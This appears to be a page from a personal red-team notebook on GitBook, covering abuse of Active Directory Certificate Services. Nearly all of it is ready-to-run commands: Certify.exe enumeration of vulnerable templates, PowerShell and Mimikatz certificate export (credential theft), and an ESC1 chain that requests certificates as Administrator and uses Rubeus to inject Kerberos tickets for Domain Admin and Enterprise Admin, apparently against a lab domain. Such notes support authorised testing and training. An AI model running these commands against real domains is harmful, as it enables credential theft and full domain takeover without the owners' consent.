theAwful
  • Introduction
  • INTERNALS
    • Responder
      • NBNS/LLMNR
    • mitm6
    • Password Spraying
    • CME/NXC Cheatsheet
    • Kerberoasting
    • AS-REP Roasting
    • Dumping NTDS
  • Metasploit Payload and Listener
    • Encoder
    • Word Macros
    • Payloads
      • Earlybird
    • Metasploit Modules
  • OSEP Cheat Sheet
  • OSEP Challenges
    • Challenge 6
  • C2
    • Sliver
  • Privilege Escalation
    • PowerUp
    • Privilege Escalation
      • Internal Privilege Escalation (Linux)
  • Windows Local Recon
    • SQL Server
    • Application Whitelisting and Credentials
  • Linux Local Recon
  • File Transfer & Execution
  • Phishing
  • Ansible/Jfrog
  • Pivoting
  • Pass-the-hash
  • Remote Access
  • Post-Exploitation
    • Add User
    • AMSI, CLM, AppLocker
  • Credentials
  • Lateral Movement
  • Domain Enumeration
    • Users and Computers
    • ACLs
    • BloodHound
    • GPO
    • Trusts
    • User Hunting
  • Active Directory
    • Domain Recon - Kali
    • Domain Recon - Windows
    • Trusts
    • ADCS
      • ESC3
  • Web Application Testing
    • Host Headers
    • WAF Bypasses
    • Template Injection
    • Prototype Pollution
      • Client-side Prototype Pollution
    • Autorize
    • SQLmap
    • SSRF
    • File Uploads
    • Command Injection
    • XXE
      • Blind XXE
    • CSRF
    • XSS
      • XSS Methodology
      • Bypass WAF
  • MOBILE APPS
    • iOS
      • Install Tools
      • SSL Killswitch
    • Android
      • Install Tools
      • Setting up Burp
      • Red Teaming
  • Exploit Dev
    • AMSI Bypass
      • AMSI OpenSession
      • AMSI ScanBuffer
    • VBA Obfsu
    • APC Injection
    • EarlyBird Injection
  • DFIR
    • Malware Analysis
    • Memory Analysis
      • Volatility
    • Registry Analysis
      • RegRipper
    • Behavior Analysis
      • ShellBags
      • UserAssist
    • Filesystems
  • VISUAL STUDIO
    • Tricks
  • Scripts and Tools
    • Grep IPs from DNS ping
    • OSINT.sh
Powered by GitBook
On this page
  • Conditions of vulnerable certificate template which can be abused
  • Identify the ADCS service installation
  • Enumerate the templates configured
  • Enumerate the vulnerable templates
  • If the enrolleeSuppliesSubject is not not allowed for all domain users, it wont show up in vulnerable template and needs to enumerated seperately (ESC1)
  • List all certificates for local machine in certificate store
  • Export the certificate in PFX format
  • Use Mimikatz to export certificate in pfx format (default cert pass is mimikatz)
  • Request certificate for DA user using ESC1 technique, and save it as cert.pem
  • Convert cert.pem to cert.pfx format
  • Request TGT using pfx cerificate and inject into memory
  • Request certificate for EA user using ESC1 technique
  • Convert cert.pem to cert.pfx format
  • Request TGT using pfx cerificate and inject into memory
  1. Active Directory

ADCS

Conditions of vulnerable certificate template which can be abused

  • CA grants normal/low privileged users enrollment rights

  • Manager approval is disabled

  • Authorization signatures are not required

  • target template grants normal/low privileged users enrollment rights

Enumerating - Active Directory certificate Service (ADCS)

Identify the ADCS service installation

Certify.exe cas

Enumerate the templates configured

Certify.exe find

Enumerate the vulnerable templates

Certify.exe find /vulnerable

If the enrolleeSuppliesSubject is not not allowed for all domain users, it wont show up in vulnerable template and needs to enumerated seperately (ESC1)

Certify.exe find /enrolleeSuppliesSubject

Persistance (THEFT-4): Extracting User and Machine certificates

List all certificates for local machine in certificate store

ls cert:\LocalMachine\My

Export the certificate in PFX format

ls cert:\LocalMachine\My\89C1171F6810A6725A47DB8D572537D736D4FF17 | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'niks' -Force -AsPlainText)

Use Mimikatz to export certificate in pfx format (default cert pass is mimikatz)

Invoke-mimikatz -Command "crypto::certificates /export" Invoke-mimikatz -Command "!crypto::certificates /systemstore:local_machine /export" cat cert.pfx | base64 -w 0 C:\AD\Tools\Rubeus.exe asktgt /user:nlamb /certificate:MNeg[...]IH0A== /password:mimikatz /nowrap /ptt

Escalation (ESC-1) : Domain User to Domain Admin and Enterprise Admin

CASE I: Domain Admin

Request certificate for DA user using ESC1 technique, and save it as cert.pem

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx

Request TGT using pfx cerificate and inject into memory

Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:niks /nowrap /ptt

CASE II: Enterprise Admin

Request certificate for EA user using ESC1 technique

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx

Request TGT using pfx cerificate and inject into memory

Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:niks /nowrap /ptt

PreviousTrustsNextESC3

Last updated 1 year ago